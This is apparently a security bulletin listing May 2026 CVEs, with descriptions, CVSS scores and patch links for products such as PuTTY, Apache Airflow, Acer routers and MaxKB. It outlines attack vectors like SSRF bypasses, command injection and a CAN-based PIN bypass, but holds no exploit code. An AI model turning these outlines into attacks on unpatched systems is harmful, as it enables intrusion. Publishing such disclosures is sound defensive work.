| ZTE--ZXUniPOS NDS-LTE | Attackers carefully craft malicious scripts, such as JavaScript, and inject them into target systems; when other users access pages containing such malicious content, the scripts are automatically loaded and executed in the victim's browser. Attackers can thereby steal user cookies, hijack session privileges, and tamper with page content. Since the malicious code is stored within the system, the attack scope is broad and the concealment is strong, making it frequently employed for data theft attacks. | 2026-05-27 | 5.7 | CVE-2026-48999 |
| ZTE--ZXUniPOS NDS-LTE | Cross-site request forgery (CSRF) vulnerabilities allow attackers to exploit a user's authenticated session to forge cross-site requests, inducing the execution of unintended operations such as tampering with configuration data. | 2026-05-27 | 5.3 | CVE-2026-49001 |
| Zyxel--GS1200-5v3 firmware | A missing authorization vulnerability in Zyxel GS1200-5v3 firmware versions through 1.00(ACPS.2)C0, GS1200-8v3 firmware versions through 1.00(ACPT.2)C0, GS1200-5HPv3 firmware versions through 1.00(ACPU.2)C0, GS1200-8HPv3 firmware versions through 1.00(ACPV.2)C0, and GS1200-10v3 firmware versions through 1.00(ACPW.2)C0 could allow a LAN-based, unauthenticated attacker to read the system configuration from a log file via a crafted HTTP request. | 2026-05-26 | 6.5 | CVE-2026-4795 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Assimp--Assimp | A vulnerability was detected in Assimp up to 6.0.4. Affected is the function glTF2Importer::ImportEmbeddedTextures in the library code/AssetLib/glTF2/glTF2Importer.cpp of the component TF File Handler. The manipulation results in null pointer dereference. The attack is only possible with local access. The exploit is now public and may be used. It is advisable to implement a patch to correct this issue. The pull request to fix this issue awaits acceptance. | 2026-05-31 | 3.3 | CVE-2026-10197 |
| Assimp--Assimp | A flaw has been found in Assimp up to 6.0.4. Affected by this vulnerability is the function Assimp::glTFImporter::ImportMeshes of the file glTFImporter.cpp of the component glTFImporter. This manipulation causes null pointer dereference. The attack is restricted to local execution. The exploit has been published and may be used. The project tagged the reported issue as bug. | 2026-05-31 | 3.3 | CVE-2026-10198 |
| Assimp--Assimp | A vulnerability has been found in Assimp up to 6.0.4. Affected by this issue is the function glTF2::LazyDict in the library glTF2Asset.h. Such manipulation of the argument operator[] leads to null pointer dereference. The attack must be carried out locally. The exploit has been disclosed to the public and may be used. The name of the patch is d24b85319bd70c65883a2b96613e07e23fb95981. It is best practice to apply a patch to resolve this issue. | 2026-05-31 | 3.3 | CVE-2026-10199 |
| Assimp--Assimp | A vulnerability was determined in Assimp up to 6.0.4. This vulnerability affects the function FBXExporter::WriteObjects of the file FBXExporter.cpp of the component UV Channel Handler. Executing a manipulation can lead to divide by zero. The attack needs to be launched locally. The exploit has been publicly disclosed and may be utilized. Applying a patch is advised to resolve this issue. The project tagged the reported issue as bug. | 2026-05-31 | 3.3 | CVE-2026-10201 |
| bugsink--bugsink | Bugsink is a self-hosted error tracking tool. Prior to 2.2.0, Bugsink issue event pages accept a direct event identifier from the URL and, in affected versions, look up that event without also requiring it to belong to the issue in the URL. This is a project-boundary authorization issue: a logged-in user with access to one project can view another project's event data through an issue they are allowed to access. The affected views include the stacktrace, details, and breadcrumbs pages for an issue event. This vulnerability is fixed in 2.2.0. | 2026-05-26 | 3.1 | CVE-2026-47715 |
| bugsink--bugsink | Bugsink is a self-hosted error tracking tool. Prior to 2.2.0, in affected versions, the issue list view authorizes access through the project in the URL, but applies the requested bulk action to the submitted issue IDs without also requiring those issues to belong to that project. This vulnerability is fixed in 2.2.0. | 2026-05-26 | 3.1 | CVE-2026-47716 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain SAUCE patches with a possible NULL pointer dereference in the handling of AppArmor notifications. The bug can be triggered by an unprivileged local user. This can lead to a kernel oops. | 2026-05-28 | 3.3 | CVE-2026-47327 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain SAUCE patches which fail to validate invalid sizes of the name field in AppArmor notification responses. The bug can be triggered by an unprivileged local user and could result in handling of crafted responses. | 2026-05-28 | 3.3 | CVE-2026-47329 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 7.17 and 7.0 contain AppArmor SAUCE patches which can, under certain circumstances, use an uninitialized variable in notification handling code. The bug can be triggered by an unprivileged local user and can result in the incorrect caching of AppArmor notification responses. | 2026-05-28 | 3.3 | CVE-2026-47330 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8 contains SAUCE patches with a possible use of an uninitialized variable in AppArmor AF_INET/AF_INET6 socket mediation code. The bug can be triggered by an unprivileged local user and could result in incorrect fine-grained mediation of network sockets. | 2026-05-28 | 3.3 | CVE-2026-47336 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain SAUCE patches with a possible NULL pointer dereference in the handling of AF_INET/AF_INET6 socket mediation. The bug can be triggered by an unprivileged local user. This can lead to a kernel oops. | 2026-05-28 | 3.3 | CVE-2026-47337 |
| ellanetworks--core | Ella Core is a 5G core designed for private networks. Prior to 1.10.0, Ella Core didn't enforce security rules on concurrent running of security procedures defined in TS 33.501 §6.9.5.1 - it could send a NAS Security Mode Command while an N2 handover was still pending (and vice versa). Concurrent Security Mode Command and N2 handover produce a KgNB mismatch between the UE and target gNB, causing the handover to fail. Requires a stalled gNB + re-registration race to trigger. This vulnerability is fixed in 1.10.0. | 2026-05-27 | 3.7 | CVE-2026-44474 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, the AMF in Free5GC does not enforce the concurrent security procedure rules defined in 3GPP TS 33.501 §6.9.5.1. The AMF does not check for ongoing N2 handover procedures before initiating a NAS Security Mode Command, and vice versa. This can lead to mismatches between NAS and AS security contexts in the network and the UE. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 3.7 | CVE-2026-42082 |
| GNU--LibreDWG | A vulnerability was determined in GNU LibreDWG up to 0.14. The impacted element is the function decompress_R2004_section of the file src/decode.c of the component Dwgread Utility. Executing a manipulation can lead to reachable assertion. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized. This patch is called e501cb9926c1e9a07a0d1cc997f3e69e9be801c9. A patch should be applied to remediate this issue. | 2026-05-25 | 3.3 | CVE-2026-9501 |
| GNU--LibreDWG | A security flaw has been discovered in GNU LibreDWG up to 0.14. This impacts the function dwg_next_entity of the file src/decode.c of the component DWG File Handler. The manipulation results in null pointer dereference. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. The patch is identified as 8f03865f37f5d4ffd616fef802acc980be54d300. Upgrading the affected component is advised. | 2026-05-25 | 3.3 | CVE-2026-9503 |
| GNU--LibreDWG | A weakness has been identified in GNU LibreDWG up to 0.14. Affected is the function bit_convert_TU of the file programs/dwggrep.c of the component Dwggrep Utility. This manipulation causes out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. Patch name: be996bf2178a40e98720f18c2414815d244413db. Applying a patch is the recommended action to fix this issue. | 2026-05-25 | 3.3 | CVE-2026-9504 |
| GNU--LibreDWG | A security flaw has been discovered in GNU LibreDWG up to 0.14. The affected element is the function match_BLOCK_HEADER of the file dwggrep.c of the component Dwggrep Utility. Performing a manipulation results in null pointer dereference. The attack requires a local approach. The exploit has been released to the public and may be used for attacks. | 2026-05-26 | 3.3 | CVE-2026-9529 |
| GNU--LibreDWG | A weakness has been identified in GNU LibreDWG up to 0.14. The impacted element is the function read_2004_compressed_section of the file src/decode.c of the component Dwgbmp Utility. Executing a manipulation can lead to out-of-bounds read. The attack requires local access. The exploit has been made available to the public and could be used for attacks. This patch is called 8f03865f37f5d4ffd616fef802acc980be54d300. It is advisable to implement a patch to correct this issue. | 2026-05-26 | 3.3 | CVE-2026-9530 |
| GPAC--GPAC | A security flaw has been discovered in GPAC up to 2.4.0. Affected is the function MergeFragment of the file src/isomedia/isom_intern.c of the component MP4Box. The manipulation results in null pointer dereference. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The patch is identified as 525bf1af642c30af04e4df5345e6d798c0a4d8a1. It is advisable to implement a patch to correct this issue. | 2026-05-26 | 3.3 | CVE-2026-9567 |
| GPAC--GPAC | A security vulnerability has been detected in GPAC up to 2.4.0. Affected by this issue is the function Media_GetSample of the file src/isomedia/media.c of the component MP4Box. Such manipulation of the argument cat leads to memory leak. The attack can only be performed from a local environment. The exploit has been disclosed publicly and may be used. The name of the patch is e79c5cbe8b3fed27f4854ec229457d30c96206f1. It is best practice to apply a patch to resolve this issue. | 2026-05-26 | 3.3 | CVE-2026-9572 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Incorrect behavior order in the Infotainment / Digital Round display of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker to bypass the PIN entry screen. The Infotainment uses presence of Wireless Control Module (WCM) traffic during its boot window as a proxy for whether an immobilizer is fitted; if no WCM messages are observed, it skips the PIN entry screen and shows the normal user interface. An attacker who silences the WCM during the boot window - for example via a separately tracked CAN bus-off technique - can present a fully unlocked Infotainment despite the PIN never being entered. Specific timing and protocol details have been withheld pending vendor remediation. | 2026-05-29 | 2.4 | CVE-2026-49317 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Incorrect behavior order in the Infotainment / Digital Round display of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker to bypass the PIN entry screen. The Infotainment uses presence of Wireless Control Module (WCM) traffic during its boot window as a proxy for whether an immobilizer is fitted; if no WCM messages are observed, it skips the PIN entry screen and shows the normal user interface. An attacker who silences the WCM during the boot window - for example via a separately tracked CAN bus-off technique - can present a fully unlocked Infotainment despite the PIN never being entered. Specific timing and protocol details have been withheld pending vendor remediation. | 2026-05-29 | 2.4 | CVE-2026-49318 |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2026.1, XXE in the UI Designer form parser was possible. | 2026-05-29 | 3.3 | CVE-2026-49383 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 open redirect in the SAML plugin was possible | 2026-05-29 | 3.1 | CVE-2026-49380 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 stored XSS on the SAML login page was possible | 2026-05-29 | 3.4 | CVE-2026-49381 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on fetchApp requests | 2026-05-29 | 3.4 | CVE-2026-49370 |
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests. The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker's control. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 3.7 | CVE-2026-48524 |
| magic-wormhole--magic-wormhole | Magic Wormhole makes it possible to get arbitrary-sized files and directories from one computer to another. Prior to 0.24.0, there is a path traversal when a receiver specifies "--output <dir>" and that output directory already exists (as a directory). This vulnerability is fixed in 0.24.0. | 2026-05-26 | 3.5 | CVE-2026-42448 |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to 1.13.0, the AnythingLLM agent filesystem copy tool validates only the top-level source and destination paths. The recursive copy helper then descends into child entries using fs.stat() and copies files with fs.copyFile() without validating each child or rejecting symlinks. Because both APIs follow symlinks, a symlink nested inside an allowed source directory can point outside the allowed filesystem root and cause outside file contents to be copied into an allowed destination as a regular file. This vulnerability is fixed in 1.13.0. | 2026-05-28 | 2 | CVE-2026-45403 |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to 1.13.0, an approved mobile device token created in single-user mode can survive single-user -> multi-user migration even when the device record has userId = null. In multi-user mode, that stale token is still accepted by the mobile authentication middleware. Because no user is attached to the request, downstream mobile handlers fall back to unscoped data-access branches and return workspaces and workspace content without per-user filtering. This permits a pre-migration mobile token to enumerate a workspace assigned only to another user and retrieve victim-owned thread metadata and chat content in multi-user mode. This vulnerability is fixed in 1.13.0. | 2026-05-28 | 2 | CVE-2026-47713 |
| OpenSC--OpenSC | OpenSC before 0.27.0-rc1, fixed in commit 3f24f0b, contains a stack buffer overflow vulnerability in piv_process_history() in src/libopensc/card-piv.c that allows physically present attackers to trigger memory corruption by presenting a crafted PIV smart card or USB device returning a URL field longer than 118 bytes in the Key History Object ASN.1 response. | 2026-05-29 | 3.8 | CVE-2026-40510 |
| OpenSC--OpenSC | OpenSC before 0.27.0, fixed in commit 0358817, contains a stack and heap buffer overrun vulnerability in the do_key_value() function in src/pkcs15init/profile.c that allows attackers to corrupt memory by supplying a crafted profile configuration file. During pkcs15-init invocation, a key value entry beginning with '=' followed by more than sizeof(keybuf) characters is copied into keybuf via memcpy without a length check, causing both stack and heap buffer overruns. | 2026-05-29 | 3.8 | CVE-2026-40528 |
| OUSL-GROUP-BrinaryBrains--School Student Management System | A vulnerability was detected in OUSL-GROUP-BrinaryBrains School Student Management System up to 1e70e5ad1125b86dca4ee086eb6bb121f17708b6. Affected by this vulnerability is the function ajax_forgot_password of the file application/controllers/Login.php of the component Forgot Password Endpoint. The manipulation of the argument email results in weak password recovery. The attack can be launched remotely. This attack is characterized by high complexity. The exploitation appears to be difficult. The exploit is now public and may be used. This product does not use versioning, which is why information about affected and unaffected releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 3.7 | CVE-2026-10169 |
| PuTTY--PuTTY | PuTTY 0.72 before 0.84 has a double free in RSA KEX. | 2026-05-25 | 3.7 | CVE-2026-48850 |
| PuTTY--PuTTY | PuTTY 0.77 before 0.84 uses a copy of the PuTTY icon as a trust indication for TELNET data but the trust status is not cleared between proxy authentication and the main session. | 2026-05-25 | 3.1 | CVE-2026-48851 |
| PuTTY--PuTTY | PuTTY 0.71 before 0.84 has an assertion failure in ECDSA signature verification. | 2026-05-25 | 3.7 | CVE-2026-48852 |
| QianFox--FoxCMS | A vulnerability was determined in QianFox FoxCMS up to 1.2.6. The impacted element is an unknown function of the file /Tag/edit of the component Administrator Backend. Executing a manipulation can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-27 | 2.4 | CVE-2026-9608 |
| Red Hat--Red Hat Quay 3 | A flaw was found in the Quay config-tool's GitLab OAuth validator. This vulnerability causes sensitive credentials, specifically client_id and client_secret, to be transmitted as plaintext in URL query parameters during POST requests to the GitLab endpoint. This insecure transmission can lead to the disclosure of these credentials in various system logs, such as server access logs, reverse proxy logs, and other monitoring systems. An attacker with access to these logs could potentially obtain these credentials, leading to unauthorized information disclosure. | 2026-05-29 | 2.7 | CVE-2026-10078 |
| rizinorg--rizin | Rizin is a UNIX-like reverse engineering framework and command-line toolset. There is a double free in librz/core/cmd/cmd_search.c:byte_pattern_search() due to wrong pointer ownership being declared. This vulnerability is fixed by commit 045fff363b42b8a6dda8ad5229c29ec3267e7dbe. | 2026-05-29 | 3.3 | CVE-2026-45324 |
| rizinorg--rizin | Rizin is a UNIX-like reverse engineering framework and command-line toolset. There is a heap-buffer-overflow in librz/bin/format/omf/omf.c. This vulnerability is fixed by commit e6d0937c8a083e23ed76ccfb9f631cdc50c7af47. | 2026-05-29 | 3.3 | CVE-2026-45613 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x before 1.6.16, and 1.7.x before 1.7.1 allows pre-authentication arbitrary file deletion via redis/memcache session poisoning bypass. | 2026-05-25 | 3.7 | CVE-2026-48847 |
| sambitraj--STUDENT-MANAGEMENT-SYSTEM | A vulnerability has been found in sambitraj STUDENT-MANAGEMENT-SYSTEM 1.0. Affected is an unknown function of the component Dashboard Page. The manipulation of the argument Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-30 | 2.4 | CVE-2026-10112 |
| SourceCodester--Hospitals Patient Records Management System | A vulnerability was found in SourceCodester/oretnom23 Hospitals Patient Records Management System 1.0. The impacted element is an unknown function of the file /admin/?page=patients/view_patient. Performing a manipulation of the argument Remarks results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2026-05-26 | 2.4 | CVE-2026-9564 |
| SourceCodester--Indian Invoicing System | A security flaw has been discovered in SourceCodester Indian Invoicing System up to 0.x/1.0. The impacted element is an unknown function of the file /Invoicing/add_order.php of the component Invoice Template Render Database-Backed. The manipulation of the argument customer_name results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 3.5 | CVE-2026-9414 |
| SourceCodester--Student Grades Management System | A vulnerability was identified in SourceCodester Student Grades Management System 1.0. Affected by this issue is some unknown functionality of the file students.php. The manipulation of the argument Remarks leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2026-05-25 | 3.5 | CVE-2026-9485 |
| Synology--Surveillance Station | Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in Archiving Pull functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to perform limited file writes via unspecified vectors. | 2026-05-27 | 2.7 | CVE-2024-47267 |
| Synology--Surveillance Station | Improper preservation of permissions vulnerability in Archiving Push functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to perform limited file writes via unspecified vectors. | 2026-05-27 | 2.7 | CVE-2024-47270 |
| Synology--Surveillance Station | Incorrect authorization vulnerability in IO Module functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to perform limited file writes via unspecified vectors. | 2026-05-27 | 2.7 | CVE-2024-47272 |
| yashpokharna2555--StudentManagementSystem | A vulnerability was detected in yashpokharna2555 StudentManagementSystem cb2f558ddf8d19396de0f92abf2d224d46a0a203. This impacts an unknown function of the file /student.php. Performing a manipulation of the argument FIRST_NAME results in cross site scripting. The attack can be initiated remotely. The exploit is now public and may be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 3.5 | CVE-2026-9471 |
| ZTE--ZXUniPOS NDS-LTE | This vulnerability stems from a business logic flaw. Attackers can exploit legitimate application functions in unintended and abnormal ways, deviating from the designer's expectations, to carry out malicious attacks. | 2026-05-26 | 3.8 | CVE-2026-44410 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Prior to 2.8.1, MaxKB v2.8.0 and prior are vulnerable to a server-side request forgery (SSRF) bypass in the OSS file service URL fetch (chat/api/oss/get_url) endpoint. The vulnerability exists due to inconsistent URL parsing between the urlparse validation function and the requests HTTP client, allowing attackers to access internal network services. This vulnerability is fixed in 2.8.1. | 2026-05-26 | not yet calculated | CVE-2026-42335 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-r8hf-mwwr-hxgc |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. MaxKB 2.8.0 and prior are vulnerable to a server-side request forgery (SSRF) bypass in the OSS file service URL fetch functionality due to inconsistent DNS resolution between validation and actual request execution, allowing attackers to access internal network services. This vulnerability is fixed in 2.8.1. | 2026-05-26 | not yet calculated | CVE-2026-42336 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-6m4p-9wwc-4q5q |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. MaxKB 2.8.0 and prior are vulnerable to a broken access control vulnerability in the OSS file service URL fetch API (chat/api/oss/get_url). The endpoint uses application_id from the URL path without validating ownership, allowing attackers to perform operations under other applications' policies. This vulnerability is fixed in 2.8.1. | 2026-05-26 | not yet calculated | CVE-2026-42337 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-2jmj-gwvg-3gp2 |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Prior to 2.9.1, MaxKB is vulnerable to SSRF via work_flow_template import. Authenticated users can supply arbitrary URLs in work_flow_template.downloadUrl, which are fetched server-side without any URL validation or internal IP filtering. This vulnerability is fixed in 2.9.1. | 2026-05-26 | not yet calculated | CVE-2026-45412 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-x9g5-j56j-4mfj |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Prior to 2.9.1, user passwords are stored using unsalted MD5 hashes, making them trivially crackable via rainbow tables or GPU-accelerated brute force (hashcat). This vulnerability is fixed in 2.9.1. | 2026-05-26 | not yet calculated | CVE-2026-45413 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-2m4c-mcq5-q8xq |
| Acer--Care Center | A security vulnerability has been identified in Acer Care Center where the ACCSvc service creates a Named Pipe with a weak Security Descriptor. This vulnerability allows an authenticated local user to connect and send a specially crafted message (message type 0x03) to the pipe, causing the service to crash with exit code 1067 (ERROR_PROCESS_ABORTED). To mitigate this potential local service disruption, Acer requires users to update the software to the latest version. | 2026-05-25 | not yet calculated | CVE-2026-9490 | https://community.acer.com/en/kb/articles/19668 |
| Acer--NitroSense V3 | NitroSense 3.x before 3.01.3052 contains a Local Privilege Escalation (LPE) vulnerability. The program exposes a Windows Named Pipe that uses a custom protocol to invoke internal functions. However, this Named Pipe is misconfigured, allowing any authenticated local user to execute arbitrary code with NT AUTHORITY\SYSTEM privileges and to delete arbitrary files with SYSTEM privileges. By leveraging this, an attacker can execute arbitrary code on the target system with elevated privileges. | 2026-05-25 | not yet calculated | CVE-2026-9489 | https://community.acer.com/en/kb/articles/19652 |
| Acer--NitroSense V3 | A Local Privilege Escalation (LPE) vulnerability affects Acer NitroSense software versions prior to 3.01.3052. The vulnerability stems from the PSAdminAgent service, which creates a Named Pipe with a weak Access Control List (ACL). This allows any authenticated local user to connect and send commands. Because the service does not check the caller's privileges before running file deletion commands, a low-privileged local user can exploit this to delete arbitrary files with system authority. | 2026-05-28 | not yet calculated | CVE-2026-9789 | https://community.acer.com/en/kb/articles/19670 |
| Acer--Predator Connect W6x | Unauthenticated Debug Service. The /sbin/mtk_dut binary is exposed on TCP port 9000 without authentication, allowing any LAN-based attacker to execute arbitrary UCC commands. | 2026-05-29 | not yet calculated | CVE-2026-49195 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Predator Connect W6x | The Wi-Fi device blocking feature fails to sanitize MAC address input, allowing injection and execution of arbitrary shell commands. | 2026-05-29 | not yet calculated | CVE-2026-49196 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Predator Connect W6x | Web endpoints intended for the Acer Connect app improperly validate the HTTP Authorization header, failing to block requests when Base64 decoding fails. | 2026-05-29 | not yet calculated | CVE-2026-49197 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Predator Connect W6x | Improper access control in the MQTT broker allows wildcard topic subscriptions, exposing all MQTT traffic to unauthorized actors. | 2026-05-29 | not yet calculated | CVE-2026-49198 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Predator Connect W6x | Crafted MQTT messages can trigger command injection, resulting in root-level code execution on the target device. | 2026-05-29 | not yet calculated | CVE-2026-49199 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Wave 7 router | The acer_cgi.log file in the device firmware is accessible without authentication via the web interface. This file contains cleartext login credentials (for web and Telnet), leading to unauthorized system access. | 2026-05-29 | not yet calculated | CVE-2026-49200 | https://community.acer.com/en/kb/articles/19673 |
| Acer--Wave 7 router | The upload.cgi binary, responsible for processing device backups, contains a hardcoded AES encryption key. This allows an attacker to decrypt, modify, and re-encrypt system backups, facilitating persistent backdoor injection. | 2026-05-29 | not yet calculated | CVE-2026-49201 | https://community.acer.com/en/kb/articles/19673 |
| amir20--dozzle | Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, the WebSocket upgrader for the /exec and /attach endpoints uses CheckOrigin: func(r *http.Request) bool { return true }, accepting upgrade requests from any origin. Combined with the JWT cookie using SameSite: Lax, this enables Cross-Site WebSocket Hijacking (CSWSH). An attacker hosting a page on a same-site origin (e.g., a sibling subdomain, or another service on localhost) can initiate a WebSocket connection to the exec endpoint that carries the victim's valid JWT cookie, gaining interactive shell access in any container the victim is authorized to access. This vulnerability is fixed in 10.5.2. | 2026-05-26 | not yet calculated | CVE-2026-44985 | https://github.com/amir20/dozzle/security/advisories/GHSA-j643-x8pv-8m67 https://github.com/amir20/dozzle/releases/tag/v10.5.2 |
| Apache Software Foundation--Apache Airflow FAB provider | Apache Airflow FAB Auth Manager contains an LDAP filter injection vulnerability (CWE-90) that allows unauthenticated attackers to exfiltrate directory data or bypass authentication. Upgrade to apache-airflow-providers-fab 3.6.4 or later. If immediate upgrade is not possible, disable LDAP authentication until the provider can be updated. | 2026-05-25 | not yet calculated | CVE-2026-46745 | https://github.com/apache/airflow/pull/66417 https://lists.apache.org/thread/dvfy0bs181xwsrjrd3y5c55ztbzm8yhh |
| Apache Software Foundation--Apache Airflow Google provider | Apache Airflow providers-google's `ComputeEngineSSHHook` disables SSH host-key verification by default, exposing SSH traffic between an Airflow worker and a Compute Engine VM to in-path network attackers who can intercept or modify the session. Users are advised to upgrade to `apache-airflow-providers-google` 22.0.0 or later. | 2026-05-25 | not yet calculated | CVE-2026-45361 | https://github.com/apache/airflow/pull/66746 https://lists.apache.org/thread/3lpj7ppwxp7jtp81rnxk75xvln7qd7h2 |
| Apache Software Foundation--Apache Artemis Stomp Protocol | A vulnerability exists in Apache Artemis whereby an application using the STOMP protocol with security credentials that grant either the consume or send permission on an address can augment the routing-type supported by that address even if said user doesn't have the createAddress permission for that particular address. A user could successfully send a message to an address or consume a message from a queue with a routing-type not supported by the corresponding address when that operation should actually be rejected on the basis that the user doesn't have permission to change the routing-type of the address. Even though the user was already granted permission to send and/or consume messages, they should not be able to augment the routing-type of the address without the createAddress permission. This issue affects Apache Artemis: from 2.50.0 through 2.53.0; Apache ActiveMQ Artemis: from 2.0.0 through 2.44.0. Users are recommended to upgrade to version 2.54.0, which fixes the issue. | 2026-05-28 | not yet calculated | CVE-2026-40914 | https://lists.apache.org/thread/6q3st8dlorz2q05svqn11k1xl7jkmm4c |
| Apache Software Foundation--Apache ECharts | A cross-site scripting (XSS) vulnerability exists in Apache ECharts in the Lines series tooltip rendering logic. This issue affects Apache ECharts: from before 6.1.0. In versions prior to 6.1.0, if both Lines series and tooltip are used, and no user-specified tooltip.formatter is provided, and series.data[i].name is specified, raw HTML string series.data[i].name can be rendered through innerHTML sink into tooltip content. Although tooltip is allowed to accept user-provided raw HTML via a custom tooltip.formatter, the built-in tooltip formatters conventionally perform HTML escaping automatically. This case breaks that convention and may unexpectedly lead to script execution when tooltips are displayed. Users are recommended to upgrade to version 6.1.0 if using the Lines series in this way, which fixes the issue. | 2026-05-25 | not yet calculated | CVE-2026-45249 | https://github.com/apache/echarts/pull/21608 https://echarts.apache.org/en/option.html#series-lines https://echarts.apache.org/handbook/en/best-practices/security/#passing_raw_html_safely https://lists.apache.org/thread/1g6xk7gd9vg1c6zyqqt2lnko10zomc3o |
| Apache Software Foundation--Apache Flink Kubernetes Operator | Files or Directories Accessible to External Parties, Server-Side Request Forgery (SSRF) vulnerability in Apache Flink Kubernetes Operator. The FlinkSessionJob jarURI is currently not validated so that it points to user-owned files or addresses. This lets a user with CR create permissions read files from the operator pod's filesystem and pull content from any backing store reachable through Flink's pluggable filesystem layer and access them through the submitted Flink job. Furthermore, for fetching from http/https addresses there is currently no allowlist on the URI scheme, no host check, no IP-range restriction, and no protection against pointing the URI at internal or link-local addresses. This issue affects Apache Flink Kubernetes Operator: from 1.3.0 before 1.15.0. Users are recommended to upgrade to version 1.15.0, which fixes the issue. | 2026-05-26 | not yet calculated | CVE-2026-40564 | https://lists.apache.org/thread/jvxs2kh2o60sl7qkl5nss4r5phzfl4cz |
| Apache Software Foundation--Apache Ignite | Relative Path Traversal vulnerability in Apache Ignite REST API. Authenticated REST API users can read any file on the server with "cmd=log" command and a log path crafted in a certain way. This issue affects Apache Ignite: from 2.0.0 through 2.17.0. Users are recommended to upgrade to version 2.18.0, which fixes the issue. | 2026-05-28 | not yet calculated | CVE-2025-48977 | https://lists.apache.org/thread/hgct6918sowd8l58yjohryhpxx81t4n1 |
| Apache Software Foundation--Apache Shiro | Default configurations of Apache Shiro have a session fixation vulnerability. This issue affects Apache Shiro from 1.0 to 2.1.0, and 3.0.0-alpha-1. Users are recommended to upgrade to version 2.1.1, or 3.0.0-alpha-2 or later, which fixes the issue. In the affected versions, when a session already exists, it is not invalidated upon successful login, nor is a new session generated with a new ID. | 2026-05-25 | not yet calculated | CVE-2026-43827 | https://shiro.apache.org/security-reports.html#cve_2026_43827 |
| Apache Software Foundation--Apache Shiro | Default configurations of Apache Shiro send sensitive cookies in HTTPS sessions without the 'Secure' attribute. This issue affects Apache Shiro from 1.0 to 2.1.0, and 3.0.0-alpha-1. Users are recommended to upgrade to version 2.1.1, or 3.0.0-alpha-2 or later, which fixes the issue. In the affected versions, the Shiro-native session manager, as well as the Remember-Me manager, sends the JSESSIONID and rememberMe cookies without the 'secure' attribute by default. | 2026-05-25 | not yet calculated | CVE-2026-43828 | https://shiro.apache.org/security-reports.html#cve_2026_43828 |
